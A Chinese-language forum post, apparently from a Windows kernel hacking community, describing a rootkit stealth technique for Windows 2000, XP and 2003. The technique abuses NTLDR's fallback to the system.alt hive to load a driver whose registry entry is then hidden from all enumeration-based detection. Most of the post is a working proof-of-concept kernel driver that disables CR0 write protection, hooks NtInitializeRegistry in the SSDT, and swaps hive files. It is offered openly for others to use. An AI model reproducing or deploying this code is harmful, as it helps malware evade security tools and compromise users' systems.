几个月前,我曾在某些帖子谈论过这个技术
现在六一节到了,为了满足广大饥渴的小朋友们,特此放出
=====================================================
Mark在Windows Internals 4th(p 210)中提到过,WIN2000下,为了保持系统HIVE的完整性,系统在刷新SYSTEM HIVE的同时,会刷新一个名为“替补储巢”的hive :System.alt
当系统储巢System已经损坏,无法加载时,就会选择这个替补储巢system.alt来加载.这是由于win2000的ntldr不知道如何使用储巢日志文件(system.log)来进行储巢修复导致的,Mark称windows XP以后的系统已经抛弃了这一机制
但事实如何呢?首先我们来看一下某份NT4的代码:
下面这个函数是BootLoader(ntldr)用来加载系统HIVE的函数:
代码:
ARC_STATUS BlLoadAndScanSystemHive( IN ULONG DeviceId, IN PCHAR DeviceName, IN PCHAR DirectoryPath, IN PWSTR BootFileSystem, OUT PCHAR BadFileName ) ................... 省略无关部分 ..................... strcpy(Directory,DirectoryPath); strcat(Directory,"\\system32\\config\\"); Status = BlLoadAndInitSystemHive(DeviceId, DeviceName, Directory, "system", FALSE, &RestartSetup); if(Status != ESUCCESS) { // // bogus hive, try system.alt // Status = BlLoadAndInitSystemHive(DeviceId, DeviceName, Directory, "system.alt", TRUE, &RestartSetup); if(Status != ESUCCESS) { strcpy(BadFileName,DirectoryPath); strcat(BadFileName,"\\SYSTEM32\\CONFIG\\SYSTEM"); goto HiveScanFailed; } }
事实上,这部分代码一直保留在WINDOWS XP和WINDOWS 2003中,直到VISTA中才去除掉,VISTA系统中已更改为仅加载SYSTEM储巢,如果SYSTEM储巢加载失败,直接拒绝继续启动。
但是,这里只是NTLDR加载的储巢,这些储巢在系统启动后会被丢弃(保存在BootLoaderBlock中)
SMSS将调用SSDT中的NtInitializeRegistry函数,通过CmpCmdInit->CmpInitializeHiveList,通过CmpLoadHiveThread系统线程为CmpMachineHiveList中的每个系统储巢做加载和初始化工作
这里系统只识别\SystemRoot\System32\Config\System储巢,如果无法加载这个储巢,系统将调用KeBugCheckEx使系统蓝屏,蓝屏代码为STATUS_CANNOT_LOAD_REGISTRY_FILE
有了上面的知识,我们很容易便可知道如何隐藏一个注册表了:
只要我们将当前SYSTEM储巢删除或者使其无法正确识别,然后在config目录下保留包含了我们的驱动服务项的SYSTEM.ALT储巢,此时重启系统,NTLDR会使用我们的SYETEM.ALT储巢,于是会加载我们的驱动程序
我们在驱动中,HOOK NtInitializeRegistry函数,等待NT内核再次初始化系统储巢,等到后,我们将SYSTEM储巢恢复(move file / fix file /redir file...),此时系统就能正常引导了
但是此时系统加载的是不包含我们的驱动服务项的储巢,所以任何利用正常、非正常枚举手法进行的检测,都检测不到我们的驱动注册表。无论是还原nt*key函数进行枚举,还是使用cm*key进行枚举,还是使用所谓的Hive解析技术进行枚举。
下面是一个这个驱动的小POC,代码如下:
代码:
#include "ntddk.h" #include "ntifs_48.h" #include "zwfunc.h" #include "stdafx.h" #define MYDEBUG 1 #if MYDEBUG #define KDMSG(_x_) DbgPrint _x_ #else #define KDMSG(_x_) #endif ULONG OldNtInitializeRegistry =0; BOOL SystemHiveIsBuild = FALSE ; const WCHAR RealSystemHiveLocation[] = L"\\SystemRoot\\System32\\Config\\SYSTEM"; NTSTATUS NewNtInitializeRegistry(USHORT BootCondition) { NTSTATUS stat ; HANDLE hfile ; IO_STATUS_BLOCK iosb ; OBJECT_ATTRIBUTES oba ; UNICODE_STRING FileName ; UNICODE_STRING SystemSave ; KDMSG(("NtInitializeRegistry is call!")); if (SystemHiveIsBuild == FALSE) { RtlInitUnicodeString(&FileName , RealSystemHiveLocation); InitializeObjectAttributes(&oba , &FileName , OBJ_KERNEL_HANDLE | OBJ_CASE_INSENSITIVE , 0 , 0 ); stat = IoCreateFile(&hfile , FILE_ALL_ACCESS , &oba , &iosb, NULL, FILE_ATTRIBUTE_NORMAL , FILE_SHARE_READ | FILE_SHARE_WRITE , FILE_OPEN , FILE_NON_DIRECTORY_FILE | FILE_SYNCHRONOUS_IO_NONALERT , NULL, 0, CreateFileTypeNone , 0, IO_NO_PARAMETER_CHECKING); KDMSG(("open config\\system return %08x\n",stat)); if (!NT_SUCCESS(stat)) { if (stat != STATUS_OBJECT_NAME_NOT_FOUND && stat != STATUS_OBJECT_PATH_NOT_FOUND) { goto end ; } } else { ZwClose(hfile); goto end ; } //now system hive is not found //move file { PFILE_RENAME_INFORMATION renameinfo ; renameinfo = (PFILE_RENAME_INFORMATION)ExAllocatePool(NonPagedPool , sizeof(FILE_RENAME_INFORMATION) + sizeof(RealSystemHiveLocation) - sizeof(WCHAR)); renameinfo->FileNameLength = sizeof(RealSystemHiveLocation) - sizeof(WCHAR); renameinfo->ReplaceIfExists = TRUE ; renameinfo->RootDirectory = 0 ; RtlCopyMemory((PVOID)renameinfo->FileName, (PVOID)RealSystemHiveLocation , sizeof(RealSystemHiveLocation)); RtlInitUnicodeString(&FileName , L"\\SystemRoot\\System32\\SYSTEM"); InitializeObjectAttributes(&oba , &FileName , OBJ_KERNEL_HANDLE | OBJ_CASE_INSENSITIVE , 0 , 0 ); stat = IoCreateFile(&hfile , FILE_ALL_ACCESS , &oba , &iosb, NULL, FILE_ATTRIBUTE_NORMAL , FILE_SHARE_READ | FILE_SHARE_WRITE , FILE_OPEN, FILE_NON_DIRECTORY_FILE | FILE_SYNCHRONOUS_IO_NONALERT , NULL, 0, CreateFileTypeNone , 0, IO_NO_PARAMETER_CHECKING); KDMSG(("open system\\system return %08x\n" , stat)); if (!NT_SUCCESS(stat)) { ExFreePool(renameinfo); goto end ; } stat = ZwSetInformationFile(hfile , &iosb , renameinfo , sizeof(FILE_RENAME_INFORMATION) + sizeof(RealSystemHiveLocation) - sizeof(WCHAR) , FileRenameInformation); KDMSG(("rename file return %08x\n" , stat)); ZwClose(hfile); SystemHiveIsBuild = TRUE ; } } end: __asm { movzx eax , BootCondition push eax call OldNtInitializeRegistry mov stat ,eax } return stat ; } NTSTATUS DriverEntry(PDRIVER_OBJECT Drvobj , PUNICODE_STRING RegistryPath) { ULONG OldCr0 ; //drv load, hook NtInitializeRegistry //IN WINDOWS XP , index of ZwInitializeRegistry is 0x5c __asm{ push eax push ebx cli mov eax , cr0 mov OldCr0 , eax and eax , 0xFFFEFFFF mov cr0 , eax mov eax ,dword ptr[KeServiceDescriptorTable] mov eax , dword ptr[eax] //get service base mov ebx , dword ptr[eax + 0x5c * 4] mov OldNtInitializeRegistry , ebx mov ebx , NewNtInitializeRegistry mov dword ptr[eax + 0x5c * 4] , ebx mov eax , OldCr0 mov cr0 , eax sti pop ebx pop eax } return STATUS_SUCCESS ; }
当然,这只是一个技巧,但是反映了一些思想:
1.所谓绕过检查,就是要让系统在某一时刻认为你是存在的,而某一时刻认为你是不存在的,利用信息的不对称来使检查失效
2.NTLDR和NTOSKRNL之间,也算是一种信息不对称,例如TOPHET,例如本篇这个技巧,都是利用NTLDR中缺少某种机制,而NTOSKRNL中存在这种机制,由于NTLDR缺少这种机制(例如TOPHET中,访问SCSI驱动器的机制),那么自然给了攻击者可趁之机
当然,微软在VISTA中大大弥补了这些不对称,但是可想而知,还是有更多的未知等着大家去探索。